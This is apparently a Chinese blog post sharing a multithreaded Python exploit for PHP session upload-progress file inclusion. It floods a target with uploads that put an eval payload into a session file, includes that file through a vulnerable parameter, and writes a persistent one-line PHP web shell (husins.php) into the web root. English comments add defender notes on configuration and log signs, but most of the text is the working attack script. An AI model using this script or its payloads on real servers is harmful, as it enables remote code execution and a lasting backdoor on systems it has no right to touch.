Python session 文件包含脚本

发布于 2021-10-17  156 次阅读


import io
import requests
import threading

# Module-level configuration for the script below.
#
# The script relies on PHP's session upload-progress handling: while a
# multipart upload is in flight, PHP presumably copies the value of the
# PHP_SESSION_UPLOAD_PROGRESS form field into the session file for the
# PHPSESSID it was given (see write()), and the other threads then feed that
# session file's path to a parameter that the target passes to include().
# Defender notes: set session.upload_progress.enabled=0 (or at least keep
# session.upload_progress.cleanup=1) and never pass request input to
# include/require; in logs this looks like bursts of multipart POSTs carrying
# PHP_SESSION_UPLOAD_PROGRESS alongside requests whose parameters reference
# /tmp/sess_<id>.
url = "" # target site URL; left empty on this page
filename = "husins.php"  # name of the PHP file the script tries to create on the server
path = "/var/www/html/" # directory that file is written to (assumes a default web root -- confirm per deployment)
sessid = "husins" # value sent as the PHPSESSID cookie, chosen by the client
getAgrv = "" # name of the GET parameter that reaches include(); empty on this page
postArgv = "ctf" # name of the POST parameter that reaches include()
sessPath = "/tmp/sess_" + sessid  # path PHP is assumed to use for this session's file (default save_path layout -- verify)

def write(session):
    """Keep posting a multipart upload that carries the PHP_SESSION_UPLOAD_PROGRESS field.

    Loops until the module-level ``event`` is cleared; ``__main__`` never clears
    it, so the loop ends only when the process exits. The HTTP response is
    assigned but never inspected. ``event.isSet()`` is the legacy camelCase
    alias of ``is_set()`` (deprecated since Python 3.10); the other thread
    bodies use ``is_set()``.

    Args:
        session: the ``requests.Session`` shared by all worker threads.
    """
    while event.isSet():
        f = io.BytesIO(b'a' * 1024 * 50)  # 50 KiB dummy upload body, rebuilt every iteration so the upload takes measurable time
        response = session.post(  # multipart POST; 'response' is never read
            url,  # module-level target URL
            cookies={'PHPSESSID': sessid},  # pin the session id so the server uses the expected session file
            data={"PHP_SESSION_UPLOAD_PROGRESS": "<?php eval($_POST[1]);?>"},  # field PHP presumably records in the session while the upload is in progress
            files={"file": ('husins.txt', f)}  # the uploaded file: field name, file name and content
        )

def post_read(session):
    """POST-parameter variant of the include step; not started by ``__main__``.

    ``__main__`` only launches ``write`` and ``get_read``, so this function is
    dead code on this page. It loops until ``event`` is cleared, posting
    ``sessPath`` under ``postArgv`` and checking the response body for the
    uploaded file name before sending the second request.

    Args:
        session: the ``requests.Session`` shared by all worker threads.
    """
    while event.is_set():
        data = {
            postArgv : sessPath  # ask the target to include the session file
        }
        res = session.post(url=url, data=data)
        if "husins.txt" in res.text:  # upload name appearing in the body is taken as proof the session file was included
            data2 = {
                postArgv: sessPath,
                "1": "file_put_contents('"+ path + filename + "' , '<?php eval($_POST[2]);?>');"  # same string as in get_read()
            }
            cookies = {
                "PHPSESSID": sessid
            }
            res2 = session.post(url=url, data=data2, cookies=cookies)
            if res2.status_code == 200:  # only the status code is checked, not whether the file was actually created
                print("[*]成功写入一句话!")
            else:
                print("[-]仍在尝试中,请稍后!")

def get_read(session):
    """GET-parameter variant of the include step; started by ``__main__`` in 29 threads.

    Loops until ``event`` is cleared (never, see ``__main__``). Each iteration
    builds ``getUrl`` by string concatenation of ``url``, ``getAgrv`` and
    ``sessPath``, posts to it, then fetches ``url + filename`` and prints
    success on any 200 response.

    Args:
        session: the ``requests.Session`` shared by all worker threads.
    """
    while event.is_set():
        getUrl=url + getAgrv + "=" + sessPath  # plain concatenation; no URL encoding of sessPath
        data = {
            "1": "file_put_contents('" + path + filename + "' , '<?php eval($_POST[2]);?>');"  # same string as in post_read()
        }
        cookies = {
            "PHPSESSID": sessid
        }
        session.post(url=getUrl, data=data, cookies=cookies)  # response discarded
        res = session.get(url + filename)
        if res.status_code == 200:  # a 200 is treated as success; the body is not checked
            print("[*]成功写入一句话!")
        else:
            print("[-]仍在尝试中,请稍后!")

if __name__ == '__main__':                                  # two groups of worker threads
    # 'event' is a module-level flag read by the thread bodies; it is set once
    # here and never cleared, and the threads are neither joined nor marked
    # daemon, so the process runs until killed.
    event = threading.Event()
    event.set()
    # One requests.Session is shared by all threads. NOTE(review): thread-safety
    # of a shared Session is not guaranteed by requests; confirm before relying on it.
    with requests.session() as session:
        for i in range(1,30):  # 29 upload threads (range starts at 1)
            threading.Thread(target=write,args=(session,)).start()

        for i in range(1,30):  # 29 include threads; post_read() is never started
            threading.Thread(target=get_read,args=(session,)).start()